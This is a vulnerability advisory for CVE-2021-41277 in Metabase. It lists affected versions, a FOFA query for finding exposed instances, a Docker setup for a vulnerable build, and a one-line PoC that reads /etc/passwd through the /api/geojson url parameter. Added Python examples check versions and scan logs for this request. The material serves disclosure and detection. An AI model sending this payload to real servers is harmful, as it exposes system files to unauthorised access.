CVE-2021-41277 Metabase sensitive information disclosure

0x0021h
Nov 21, 2021


Vulnerability CVSS score: 9.9; damage level: severe.

FOFA:

app="metabase"

Affected version:

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
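To turn the two affected ranges above into something an inventory script can apply, here is an added example (not part of the original post) that compares a Metabase version string against both ranges. It assumes plain dotted numeric versions, optionally prefixed with "v" as in the Docker tag used below.

```python
# Added example: decide whether a Metabase version falls inside the
# affected ranges stated in the advisory (< 0.40.5, or >= 1.0.0 and < 1.40.5).
from typing import Tuple

def parse_version(version: str) -> Tuple[int, ...]:
    """Turn 'v0.40.4' or '1.40.5' into a tuple of ints that compares naturally.
    Assumes purely numeric dotted versions (no pre-release suffixes)."""
    cleaned = version.strip().lstrip("v")
    return tuple(int(part) for part in cleaned.split("."))

# Range boundaries copied from the advisory text above.
FIX_0X = parse_version("0.40.5")
START_1X = parse_version("1.0.0")
FIX_1X = parse_version("1.40.5")

def is_affected(version: str) -> bool:
    """True when the version is in either affected range."""
    ver = parse_version(version)
    if ver < FIX_0X:
        return True
    if START_1X <= ver < FIX_1X:
        return True
    return False

if __name__ == "__main__":
    # The tag used in the demonstration below is inside the first range.
    for v in ("v0.40.4", "0.40.5", "1.40.4", "1.40.5", "0.41.1"):
        print(v, "affected" if is_affected(v) else "not affected")
```

Versions at or above 0.40.5 but below 1.0.0 are treated as fixed, matching the advisory's ranges; anything with a pre-release suffix would need the parser extended.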

Vulnerability demonstration:

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4

PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1
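From a detection standpoint, the request above is easy to spot in access logs: a hit on /api/geojson whose url parameter carries a scheme other than http or https. The following added example (not from the original post) scans constructed log lines in common log format for exactly that pattern; the log lines, IP addresses and regex are assumptions for the demonstration, and the check deliberately flags any non-http(s) scheme, not only file:, so it generalises beyond the single PoC shown.

```python
# Added example: flag /api/geojson requests whose url= parameter does not use
# an http(s) scheme, as seen in the PoC above. Log lines are constructed.
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access log (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Nov/2021:10:00:01 +0000] "GET /api/geojson?url=file:/etc/passwd HTTP/1.1" 200 1832
10.0.0.6 - - [21/Nov/2021:10:00:02 +0000] "GET /api/geojson?url=https://example.org/regions.geojson HTTP/1.1" 200 4402
10.0.0.7 - - [21/Nov/2021:10:00:03 +0000] "GET /api/geojson?url=file%3A%2F%2F%2Fetc%2Fhosts HTTP/1.1" 200 220
10.0.0.8 - - [21/Nov/2021:10:00:04 +0000] "GET /api/card/1 HTTP/1.1" 200 900
"""

# Extract source address, method and request target from a common-log-format line.
REQ_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
ALLOWED_SCHEMES = {"http", "https"}

def geojson_url_param(target: str) -> Optional[str]:
    """Return the decoded url= value if the target is an /api/geojson request, else None."""
    parts = urlsplit(target)
    if parts.path != "/api/geojson":
        return None
    values = parse_qs(parts.query).get("url")
    if not values:
        return None
    # parse_qs already decodes once; a second unquote catches double-encoded input.
    return unquote(values[0])

def suspicious_scheme(url: str) -> bool:
    """True for any scheme other than http/https (file:, jar:, an empty scheme, ...)."""
    return urlsplit(url).scheme.lower() not in ALLOWED_SCHEMES

def find_suspicious(log_text: str) -> List[Tuple[str, str]]:
    """Return (source address, decoded url parameter) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        match = REQ_RE.match(line)
        if not match:
            continue
        url = geojson_url_param(match.group("target"))
        if url is not None and suspicious_scheme(url):
            hits.append((match.group("src"), url))
    return hits

if __name__ == "__main__":
    for src, url in find_suspicious(SAMPLE_LOG):
        print(f"{src} requested /api/geojson with non-http URL: {url}")
```

The empty-scheme case is flagged on purpose: a relative value is not a legitimate remote GeoJSON source either, so it is better reviewed than ignored.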
